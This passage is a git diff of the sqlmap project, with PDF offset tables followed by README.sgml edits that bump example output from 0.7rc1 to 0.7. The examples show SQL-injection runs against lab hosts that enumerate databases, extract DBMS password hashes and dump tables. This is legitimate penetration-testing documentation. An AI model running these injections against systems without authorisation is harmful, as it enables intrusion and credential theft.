n -0000242520 00000 n -0000242749 00000 n -0000243016 00000 n -0000243271 00000 n -0000243554 00000 n -0000243872 00000 n -0000244156 00000 n -0000244378 00000 n -0000244681 00000 n -0000244969 00000 n -0000245291 00000 n -0000245585 00000 n -0000246162 00000 n -0000246680 00000 n -0000247252 00000 n -0000248258 00000 n -0000248539 00000 n -0000248816 00000 n -0000249038 00000 n -0000249262 00000 n -0000249445 00000 n -0000249637 00000 n -0000249814 00000 n -0000249988 00000 n -0000250239 00000 n -0000250506 00000 n -0000250743 00000 n -0000251081 00000 n -0000251371 00000 n -0000251716 00000 n -0000251994 00000 n -0000252260 00000 n -0000252501 00000 n -0000252845 00000 n -0000253049 00000 n -0000253232 00000 n -0000253452 00000 n -0000253787 00000 n -0000254130 00000 n -0000254461 00000 n -0000254708 00000 n -0000255107 00000 n -0000255422 00000 n -0000255767 00000 n -0000256001 00000 n -0000256279 00000 n -0000256632 00000 n -0000257059 00000 n -0000257438 00000 n -0000257719 00000 n -0000257992 00000 n -0000258258 00000 n -0000258536 00000 n -0000258809 00000 n -0000259046 00000 n -0000259392 00000 n -0000259631 00000 n -0000259835 00000 n -0000260090 00000 n -0000260370 00000 n -0000260557 00000 n -0000260827 00000 n -0000261060 00000 n -0000261318 00000 n -0000261592 00000 n -0000261874 00000 n -0000262100 00000 n -0000262369 00000 n -0000262601 00000 n +0000220159 00000 n +0000220367 00000 n +0000220545 00000 n +0000220774 00000 n +0000220962 00000 n +0000221186 00000 n +0000221371 00000 n +0000221588 00000 n +0000221772 00000 n +0000221966 00000 n +0000222198 00000 n +0000222513 00000 n +0000222807 00000 n +0000223096 00000 n +0000223424 00000 n +0000223680 00000 n +0000223936 00000 n +0000224198 00000 n +0000224473 00000 n +0000224727 00000 n +0000224956 00000 n +0000225183 00000 n +0000225462 00000 n +0000225664 00000 n +0000225854 00000 n +0000226071 00000 n +0000226368 00000 n +0000226579 00000 n +0000226833 00000 n +0000227097 00000 n +0000227335 00000 n +0000227586 00000 n +0000227853 00000 n +0000228123 00000 n +0000228411 00000 n +0000228621 00000 n +0000228867 00000 n +0000229120 00000 n +0000229383 00000 n +0000229673 00000 n +0000229937 00000 n +0000230196 00000 n +0000230458 00000 n +0000230725 00000 n +0000230977 00000 n +0000231249 00000 n +0000231508 00000 n +0000231739 00000 n +0000232055 00000 n +0000232293 00000 n +0000232508 00000 n +0000232742 00000 n +0000233025 00000 n +0000233222 00000 n +0000233463 00000 n +0000233692 00000 n +0000233941 00000 n +0000234217 00000 n +0000234492 00000 n +0000234728 00000 n +0000234987 00000 n +0000235210 00000 n +0000235428 00000 n +0000235679 00000 n +0000235928 00000 n +0000236194 00000 n +0000236486 00000 n +0000236725 00000 n +0000236996 00000 n +0000237211 00000 n +0000237494 00000 n +0000237784 00000 n +0000238047 00000 n +0000238316 00000 n +0000238613 00000 n +0000238872 00000 n +0000239151 00000 n +0000239697 00000 n +0000240259 00000 n +0000240716 00000 n +0000241933 00000 n +0000242119 00000 n +0000242408 00000 n +0000242662 00000 n +0000243043 00000 n +0000243228 00000 n +0000243587 00000 n +0000243954 00000 n +0000244286 00000 n +0000244671 00000 n +0000244914 00000 n +0000245227 00000 n +0000245537 00000 n +0000245832 00000 n +0000246139 00000 n +0000246387 00000 n +0000246749 00000 n +0000246997 00000 n +0000247209 00000 n +0000247476 00000 n +0000247777 00000 n +0000247965 00000 n +0000248255 00000 n +0000248498 00000 n +0000248792 00000 n +0000249100 00000 n +0000249418 00000 n +0000249660 00000 n +0000249964 00000 n +0000250218 00000 n +0000250465 00000 n +0000250762 00000 n +0000251110 00000 n +0000251402 00000 n +0000251609 00000 n +0000251956 00000 n +0000252295 00000 n +0000252592 00000 n +0000252926 00000 n +0000253271 00000 n +0000253566 00000 n +0000253937 00000 n +0000254535 00000 n +0000254876 00000 n +0000255250 00000 n +0000255838 00000 n +0000256111 00000 n +0000256379 00000 n +0000256574 00000 n +0000256771 00000 n +0000256956 00000 n +0000257185 00000 n +0000257437 00000 n +0000257654 00000 n +0000257834 00000 n +0000258072 00000 n +0000258260 00000 n +0000258496 00000 n +0000258687 00000 n +0000258871 00000 n +0000259055 00000 n +0000259253 00000 n +0000259502 00000 n +0000259834 00000 n +0000260154 00000 n +0000260498 00000 n +0000260770 00000 n +0000261035 00000 n +0000261306 00000 n +0000261605 00000 n +0000261869 00000 n +0000262097 00000 n +0000262323 00000 n +0000262631 00000 n 0000262832 00000 n -0000263113 00000 n -0000263431 00000 n -0000263727 00000 n -0000264054 00000 n -0000264324 00000 n -0000264528 00000 n -0000264841 00000 n -0000265160 00000 n -0000265430 00000 n -0000265741 00000 n -0000266058 00000 n -0000266340 00000 n -0000266674 00000 n -0000267247 00000 n -0000267733 00000 n -0000268183 00000 n -0000269171 00000 n -0000269580 00000 n -0000270000 00000 n -0000270340 00000 n -0000270614 00000 n -0000270801 00000 n -0000271040 00000 n -0000271355 00000 n -0000271707 00000 n -0000272032 00000 n -0000272367 00000 n -0000272693 00000 n -0000273099 00000 n -0000273367 00000 n -0000273587 00000 n -0000273776 00000 n -0000274090 00000 n -0000274356 00000 n -0000274669 00000 n -0000275006 00000 n -0000275257 00000 n -0000275598 00000 n -0000275866 00000 n -0000276135 00000 n -0000276526 00000 n -0000276918 00000 n -0000277137 00000 n -0000277520 00000 n -0000277907 00000 n -0000278214 00000 n -0000278581 00000 n -0000278977 00000 n -0000279552 00000 n -0000279850 00000 n -0000280244 00000 n -0000280732 00000 n -0000280916 00000 n -0000281083 00000 n -0000281391 00000 n -0000281577 00000 n -0000281842 00000 n -0000282103 00000 n -0000282372 00000 n -0000282647 00000 n -0000282862 00000 n -0000283178 00000 n -0000283401 00000 n -0000283578 00000 n -0000283788 00000 n -0000284066 00000 n -0000284237 00000 n -0000284484 00000 n -0000284703 00000 n -0000284975 00000 n -0000285246 00000 n -0000285517 00000 n -0000285732 00000 n -0000286002 00000 n -0000286217 00000 n -0000286426 00000 n -0000286944 00000 n -0000287217 00000 n -0000287464 00000 n -0000287857 00000 n -0000288128 00000 n -0000288398 00000 n -0000288610 00000 n -0000288823 00000 n -0000288999 00000 n -0000289234 00000 n -0000289417 00000 n -0000289639 00000 n -0000289815 00000 n -0000289987 00000 n -0000290191 00000 n -0000290445 00000 n -0000290702 00000 n -0000290937 00000 n -0000291227 00000 n -0000291544 00000 n -0000291835 00000 n -0000292177 00000 n -0000292453 00000 n -0000292716 00000 n -0000292964 00000 n -0000293300 00000 n -0000293507 00000 n -0000293695 00000 n -0000293942 00000 n -0000294267 00000 n -0000294489 00000 n -0000294815 00000 n -0000295140 00000 n -0000295461 00000 n -0000295710 00000 n -0000296101 00000 n -0000296404 00000 n -0000296742 00000 n -0000296974 00000 n -0000297247 00000 n -0000297569 00000 n -0000297958 00000 n -0000298319 00000 n -0000298632 00000 n -0000298918 00000 n -0000299198 00000 n -0000299462 00000 n -0000299742 00000 n -0000300013 00000 n -0000300236 00000 n -0000300555 00000 n -0000300792 00000 n -0000300996 00000 n -0000301228 00000 n -0000301506 00000 n -0000301696 00000 n -0000301955 00000 n -0000302184 00000 n -0000302454 00000 n -0000302732 00000 n -0000303016 00000 n -0000303238 00000 n -0000303515 00000 n -0000303748 00000 n -0000303983 00000 n -0000304248 00000 n -0000304563 00000 n -0000304855 00000 n -0000305156 00000 n -0000305421 00000 n -0000305691 00000 n -0000305894 00000 n -0000306204 00000 n -0000306521 00000 n -0000306791 00000 n -0000307099 00000 n -0000307424 00000 n -0000307703 00000 n -0000308050 00000 n -0000308623 00000 n -0000309148 00000 n -0000309617 00000 n -0000310728 00000 n -0000310930 00000 n -0000311300 00000 n -0000311689 00000 n -0000311866 00000 n -0000312205 00000 n -0000312474 00000 n -0000312850 00000 n -0000313221 00000 n -0000313477 00000 n -0000313849 00000 n -0000314372 00000 n -0000314596 00000 n -0000314784 00000 n -0000314971 00000 n -0000316288 00000 n -0000318064 00000 n -0000318184 00000 n -0000318304 00000 n -0000318377 00000 n -0000325385 00000 n -0000325559 00000 n -0000325730 00000 n -0000325899 00000 n -0000326068 00000 n -0000326239 00000 n -0000326409 00000 n -0000326580 00000 n -0000326750 00000 n -0000326921 00000 n -0000327091 00000 n -0000327262 00000 n -0000327435 00000 n -0000327618 00000 n -0000327839 00000 n -0000328064 00000 n -0000328309 00000 n -0000328579 00000 n -0000328844 00000 n -0000329107 00000 n -0000329374 00000 n -0000329641 00000 n -0000329912 00000 n -0000330179 00000 n -0000330446 00000 n -0000330593 00000 n -0000330711 00000 n -0000330829 00000 n -0000330959 00000 n -0000331099 00000 n -0000331194 00000 n -0000331315 00000 n -0000331355 00000 n -0000331487 00000 n +0000263021 00000 n +0000263320 00000 n +0000263524 00000 n +0000263782 00000 n +0000264057 00000 n +0000264308 00000 n +0000264563 00000 n +0000264853 00000 n +0000265132 00000 n +0000265450 00000 n +0000265656 00000 n +0000265905 00000 n +0000266176 00000 n +0000266455 00000 n +0000266729 00000 n +0000267002 00000 n +0000267271 00000 n +0000267535 00000 n +0000267810 00000 n +0000268093 00000 n +0000268329 00000 n +0000268664 00000 n +0000268907 00000 n +0000269121 00000 n +0000269401 00000 n +0000269598 00000 n +0000269851 00000 n +0000270088 00000 n +0000270353 00000 n +0000270635 00000 n +0000270928 00000 n +0000271168 00000 n +0000271435 00000 n +0000271672 00000 n +0000271902 00000 n +0000272170 00000 n +0000272426 00000 n +0000272710 00000 n +0000273029 00000 n +0000273314 00000 n +0000273537 00000 n +0000273841 00000 n +0000274130 00000 n +0000274453 00000 n +0000274748 00000 n +0000275329 00000 n +0000275852 00000 n +0000276429 00000 n +0000277487 00000 n +0000277769 00000 n +0000278047 00000 n +0000278270 00000 n +0000278495 00000 n +0000278679 00000 n +0000278872 00000 n +0000279050 00000 n +0000279225 00000 n +0000279477 00000 n +0000279745 00000 n +0000279982 00000 n +0000280320 00000 n +0000280610 00000 n +0000280955 00000 n +0000281233 00000 n +0000281499 00000 n +0000281740 00000 n +0000282084 00000 n +0000282288 00000 n +0000282471 00000 n +0000282691 00000 n +0000283026 00000 n +0000283369 00000 n +0000283700 00000 n +0000283947 00000 n +0000284346 00000 n +0000284661 00000 n +0000285006 00000 n +0000285240 00000 n +0000285518 00000 n +0000285871 00000 n +0000286298 00000 n +0000286677 00000 n +0000286958 00000 n +0000287231 00000 n +0000287497 00000 n +0000287775 00000 n +0000288048 00000 n +0000288285 00000 n +0000288631 00000 n +0000288870 00000 n +0000289074 00000 n +0000289329 00000 n +0000289609 00000 n +0000289796 00000 n +0000290066 00000 n +0000290299 00000 n +0000290557 00000 n +0000290831 00000 n +0000291113 00000 n +0000291339 00000 n +0000291608 00000 n +0000291840 00000 n +0000292071 00000 n +0000292352 00000 n +0000292670 00000 n +0000292966 00000 n +0000293293 00000 n +0000293563 00000 n +0000293767 00000 n +0000294080 00000 n +0000294399 00000 n +0000294669 00000 n +0000294980 00000 n +0000295297 00000 n +0000295579 00000 n +0000295913 00000 n +0000296486 00000 n +0000296972 00000 n +0000297422 00000 n +0000298420 00000 n +0000298829 00000 n +0000299249 00000 n +0000299589 00000 n +0000299863 00000 n +0000300050 00000 n +0000300289 00000 n +0000300604 00000 n +0000300956 00000 n +0000301281 00000 n +0000301616 00000 n +0000301942 00000 n +0000302348 00000 n +0000302616 00000 n +0000302836 00000 n +0000303025 00000 n +0000303339 00000 n +0000303605 00000 n +0000303918 00000 n +0000304255 00000 n +0000304506 00000 n +0000304847 00000 n +0000305115 00000 n +0000305384 00000 n +0000305775 00000 n +0000306167 00000 n +0000306386 00000 n +0000306769 00000 n +0000307156 00000 n +0000307463 00000 n +0000307830 00000 n +0000308226 00000 n +0000308801 00000 n +0000309099 00000 n +0000309493 00000 n +0000309981 00000 n +0000310165 00000 n +0000310332 00000 n +0000310640 00000 n +0000310826 00000 n +0000311091 00000 n +0000311352 00000 n +0000311621 00000 n +0000311896 00000 n +0000312111 00000 n +0000312427 00000 n +0000312650 00000 n +0000312827 00000 n +0000313037 00000 n +0000313315 00000 n +0000313486 00000 n +0000313733 00000 n +0000313952 00000 n +0000314224 00000 n +0000314495 00000 n +0000314766 00000 n +0000314981 00000 n +0000315251 00000 n +0000315466 00000 n +0000315675 00000 n +0000316193 00000 n +0000316466 00000 n +0000316713 00000 n +0000317106 00000 n +0000317377 00000 n +0000317647 00000 n +0000317859 00000 n +0000318072 00000 n +0000318248 00000 n +0000318483 00000 n +0000318666 00000 n +0000318888 00000 n +0000319064 00000 n +0000319236 00000 n +0000319440 00000 n +0000319694 00000 n +0000319951 00000 n +0000320186 00000 n +0000320476 00000 n +0000320793 00000 n +0000321084 00000 n +0000321426 00000 n +0000321702 00000 n +0000321965 00000 n +0000322213 00000 n +0000322549 00000 n +0000322756 00000 n +0000322944 00000 n +0000323191 00000 n +0000323516 00000 n +0000323738 00000 n +0000324064 00000 n +0000324389 00000 n +0000324710 00000 n +0000324959 00000 n +0000325350 00000 n +0000325653 00000 n +0000325991 00000 n +0000326223 00000 n +0000326496 00000 n +0000326818 00000 n +0000327207 00000 n +0000327568 00000 n +0000327881 00000 n +0000328167 00000 n +0000328447 00000 n +0000328711 00000 n +0000328991 00000 n +0000329262 00000 n +0000329485 00000 n +0000329804 00000 n +0000330041 00000 n +0000330245 00000 n +0000330477 00000 n +0000330755 00000 n +0000330945 00000 n +0000331204 00000 n +0000331433 00000 n +0000331703 00000 n +0000331981 00000 n +0000332265 00000 n +0000332487 00000 n +0000332764 00000 n +0000332997 00000 n +0000333232 00000 n +0000333497 00000 n +0000333812 00000 n +0000334104 00000 n +0000334405 00000 n +0000334670 00000 n +0000334940 00000 n +0000335143 00000 n +0000335453 00000 n +0000335770 00000 n +0000336040 00000 n +0000336348 00000 n +0000336673 00000 n +0000336952 00000 n +0000337299 00000 n +0000337872 00000 n +0000338397 00000 n +0000338866 00000 n +0000339977 00000 n +0000340179 00000 n +0000340549 00000 n +0000340938 00000 n +0000341115 00000 n +0000341454 00000 n +0000341723 00000 n +0000342099 00000 n +0000342470 00000 n +0000342726 00000 n +0000343098 00000 n +0000343621 00000 n +0000343845 00000 n +0000344033 00000 n +0000344220 00000 n +0000345537 00000 n +0000347565 00000 n +0000347685 00000 n +0000347805 00000 n +0000347893 00000 n +0000347975 00000 n +0000354890 00000 n +0000355064 00000 n +0000355235 00000 n +0000355404 00000 n +0000355573 00000 n +0000355744 00000 n +0000355914 00000 n +0000356085 00000 n +0000356255 00000 n +0000356426 00000 n +0000356596 00000 n +0000356767 00000 n +0000356937 00000 n +0000357108 00000 n +0000357275 00000 n +0000357458 00000 n +0000357666 00000 n +0000357889 00000 n +0000358116 00000 n +0000358391 00000 n +0000358655 00000 n +0000358919 00000 n +0000359186 00000 n +0000359453 00000 n +0000359724 00000 n +0000359993 00000 n +0000360260 00000 n +0000360437 00000 n +0000360555 00000 n +0000360671 00000 n +0000360794 00000 n +0000360936 00000 n +0000361050 00000 n +0000361171 00000 n +0000361211 00000 n +0000361343 00000 n trailer -<< /Size 1257 -/Root 1255 0 R -/Info 1256 0 R -/ID [<31B9570C66A0F80A8AEDAEACCA5C7665> <31B9570C66A0F80A8AEDAEACCA5C7665>] >> +<< /Size 1311 +/Root 1309 0 R +/Info 1310 0 R +/ID [<2975DD76003519420B53C4C69C6E452E> <2975DD76003519420B53C4C69C6E452E>] >> startxref -331819 +361675 %%EOF diff --git a/doc/README.sgml b/doc/README.sgml index 61deec94b..795df813e 100644 --- a/doc/README.sgml +++ b/doc/README.sgml @@ -51,7 +51,9 @@ sqlmap relies on the for some of its post-exploitation takeover functionalities. You need to grab a copy of it from the -page. The required version is 3.2 or above. +page. The required version is 3.2 or above, recommended is the +latest 3.3 development version from Metasploit's subversion +repository. Optionally, if you are running sqlmap on Windows, you may wish to install @@ -348,47 +350,34 @@ stand-alone executable. Download and update -

-sqlmap 0.7 release candidate 1 version can be downloaded as a - file or as a file. -

sqlmap can be downloaded from its -. +. It is available in various formats: - operating system independent. - operating system independent. - operating system independent. - architecture independent for Debian and any other Debian derivated GNU/Linux distribution. - architecture independent for Fedora and any other operating system that can install RPM packages. - that does not require the Python interpreter to be installed on the operating system. -

-Whatever way you downloaded sqlmap, run it with --update -option to update it to the latest stable version available on its -. -

You can also checkout the source code from the sqlmap @@ -406,7 +395,8 @@ sqlmap is released under the terms of the . sqlmap is copyrighted by -and . +(2007-2009) and +(2006). Usage @@ -415,7 +405,7 @@ and . $ python sqlmap.py -h - sqlmap/0.7rc1 + sqlmap/0.7 by Bernardo Damele A. G. Usage: sqlmap.py [options] @@ -498,16 +488,15 @@ Options: --dbs Enumerate DBMS databases --tables Enumerate DBMS database tables (opt -D) --columns Enumerate DBMS database table columns (req -T opt -D) - --dump Dump DBMS database table entries (req -T, opt -D, -C, - --start, --stop) + --dump Dump DBMS database table entries (req -T, opt -D, -C) --dump-all Dump all DBMS databases tables entries -D DB DBMS database to enumerate -T TBL DBMS database table to enumerate -C COL DBMS database table column to enumerate -U USER DBMS user to enumerate --exclude-sysdbs Exclude DBMS system databases when enumerating tables - --start=LIMITSTART First table entry to dump - --stop=LIMITSTOP Last table entry to dump + --start=LIMITSTART First query output entry to retrieve + --stop=LIMITSTOP Last query output entry to retrieve --sql-query=QUERY SQL statement to be executed --sql-shell Prompt for an interactive SQL shell @@ -635,7 +624,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] [hh:mm:55] [INFO] testing MySQL @@ -648,7 +637,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -668,7 +657,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:44] [TRAFFIC IN] HTTP response (OK - 200): @@ -689,7 +678,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -709,7 +698,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:17] [TRAFFIC IN] HTTP response (OK - 200): @@ -737,7 +726,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:18] [TRAFFIC IN] HTTP response (OK - 200): @@ -1047,7 +1036,7 @@ Host: 192.168.1.125:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Cookie: ASPSESSIONIDSABTRCAS=HPCBGONANJBGFJFHGOKDMCGJ Connection: close @@ -1063,7 +1052,7 @@ Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 Cookie: ASPSESSIONIDSABTRCAS=469 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:40] [WARNING] Cookie parameter 'ASPSESSIONIDSABTRCAS' is not dynamic @@ -1114,7 +1103,7 @@ Accept-language: en-us,en;q=0.5 Referer: http://www.google.com Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1130,7 +1119,7 @@ By default sqlmap perform HTTP requests providing the following HTTP User-Agent header value: -sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +sqlmap/0.7 (http://sqlmap.sourceforge.net)

@@ -1251,7 +1240,7 @@ Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 Authorization: Basic dGVzdHVzZXI6dGVzdHBhc3M= -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1272,7 +1261,7 @@ Authorization: Digest username="testuser", realm="Testing digest authentication" nonce="Qw52C8RdBAA=2d7eb362292b24718dcb6e4d9a7bf0f13d58fa9d", uri="/sqlmap/mysql/digest/get_int.php?id=1", response="16d01b08ff2f77d8ff0183d706f96747", algorithm="MD5", qop=auth, nc=00000001, cnonce="579be5eb8753693a" -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] @@ -1455,7 +1444,7 @@ Example on a MySQL 5.0.67 target: $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \ - -p "user-agent" --user-agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)" + -p "user-agent" --user-agent "sqlmap/0.7 (http://sqlmap.sourceforge.net)" [hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET [hh:mm:40] [INFO] testing connection to the target url @@ -1600,7 +1589,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [...] [hh:mm:17] [INFO] GET parameter 'id' is custom injectable @@ -1672,7 +1661,7 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int_refresh.php?id= [hh:mm:50] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:50] [TRAFFIC IN] HTTP response (OK - 200): @@ -1694,7 +1683,7 @@ Content-Type: text/html [hh:mm:51] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200): @@ -1716,7 +1705,7 @@ Content-Type: text/html [hh:mm:51] [TRAFFIC OUT] HTTP request: GET /sqlmap/mysql/get_int_refresh.php?id=1 HTTP/1.1 Host: 192.168.1.121:80 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:51] [TRAFFIC IN] HTTP response (OK - 200): @@ -2143,7 +2132,7 @@ Host: 192.168.1.121:80 Accept-language: en-us,en;q=0.5 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, image/png,*/*;q=0.5 -User-agent: sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) +User-agent: sqlmap/0.7 (http://sqlmap.sourceforge.net) Connection: close [hh:mm:29] [TRAFFIC IN] HTTP response (OK - 200): @@ -2324,7 +2313,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1" -v 1 [hh:mm:38] [INFO] testing Oracle [hh:mm:38] [INFO] confirming Oracle [hh:mm:38] [INFO] the back-end DBMS is Oracle -[hh:mm:38] [INFO] query: SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1 +[hh:mm:38] [INFO] query: SELECT SUBSTR((VERSION), 1, 2) FROM SYS.PRODUCT_COMPONENT_VERSION +WHERE ROWNUM=1 [hh:mm:38] [INFO] retrieved: 10 [hh:mm:38] [INFO] performed 20 queries in 0 seconds web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) @@ -2699,11 +2689,11 @@ Example on a MySQL 5.0.67 target: $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --passwords -v 0 [*] debian-sys-maint [1]: - password hash: *BBDC22D2B1E18F8628B2922864A621B32A1B1892 + password hash: *BBDC22D2B1E18C8628D29228649621B32A1B1892 [*] root [1]: - password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B + password hash: *81F5E21235407A884A6CD4A731FEBFB6AF209E1B [*] testuser [1]: - password hash: *00E247AC5F9AF26AE0194B41E1E769DEE1429A29 + password hash: *00E247BD5F9AF26AE0194B71E1E769D1E1429A29

@@ -2719,12 +2709,12 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1" --pas database management system users password hashes: [*] sa [1]: - password hash: 0x01000e16d704aa252b7c38d1aeae18756e98172f4b34104d8ee32c2f01b293b03edb7491f + password hash: 0x01000a16d704fa252b7c38d1aeae18756e98172f4b34104d8ce32c2f01b293b03edb7491f ba9930b62ee5d506955 header: 0x0100 - salt: 0e16d704 - mixedcase: aa252b7c38d1aeae18756e98172f4b34104d8ee3 - uppercase: 2c2f01b293b03edb7491fba9930b62ee5d506955 + salt: 0a16d704 + mixedcase: fa252b7c38d1aeae18756e98172f4b34104d8ee3 + uppercase: 2c2f01b293b03edb7491fba9930b62ce5d506955

@@ -2764,7 +2754,7 @@ CHR(114)||CHR(101)||CHR(115) OFFSET 0 LIMIT 1 [hh:mm:51] [INFO] performed 251 queries in 2 seconds database management system users password hashes: [*] postgres [1]: - password hash: md5d7d880f96044b72d0bba108ace96d1e4 + password hash: md5d7d880f96034b72d0bba108afe96c1e7 @@ -3229,7 +3219,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | NULL | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3281,7 +3271,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3294,7 +3284,7 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv "1","luther","blissett" "2","fluffy","bunny" "3","wu","ming" -"4","sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)","user agent header" +"4","sqlmap/0.7 (http://sqlmap.sourceforge.net)","user agent header" "5","","nameisnull" @@ -3322,7 +3312,7 @@ Table: users +----+----------------------------------------------+-------------------+ | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | +----+----------------------------------------------+-------------------+ @@ -3354,7 +3344,7 @@ Table: users | 1 | luther | blissett | | 2 | fluffy | bunny | | 3 | wu | ming | -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 5 | NULL | nameisnull | +----+----------------------------------------------+-------------------+ @@ -3443,7 +3433,7 @@ Table: users +----+----------------------------------------------+-------------------+ | id | name | surname | +----+----------------------------------------------+-------------------+ -| 4 | sqlmap/0.7rc1 (http://sqlmap.sourceforge.net) | user agent header | +| 4 | sqlmap/0.7 (http://sqlmap.sourceforge.net) | user agent header | | 2 | fluffy | bunny | | 1 | luther | blisset | | 3 | wu | ming | @@ -3663,7 +3653,8 @@ $ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" --sql sql> [TAB TAB] LIMIT -(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y' +(SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) +LIMIT 0, 1)='Y' AND ORD(MID((%s), %d, 1)) > %d CAST(%s AS CHAR(10000)) COUNT(%s) @@ -3676,7 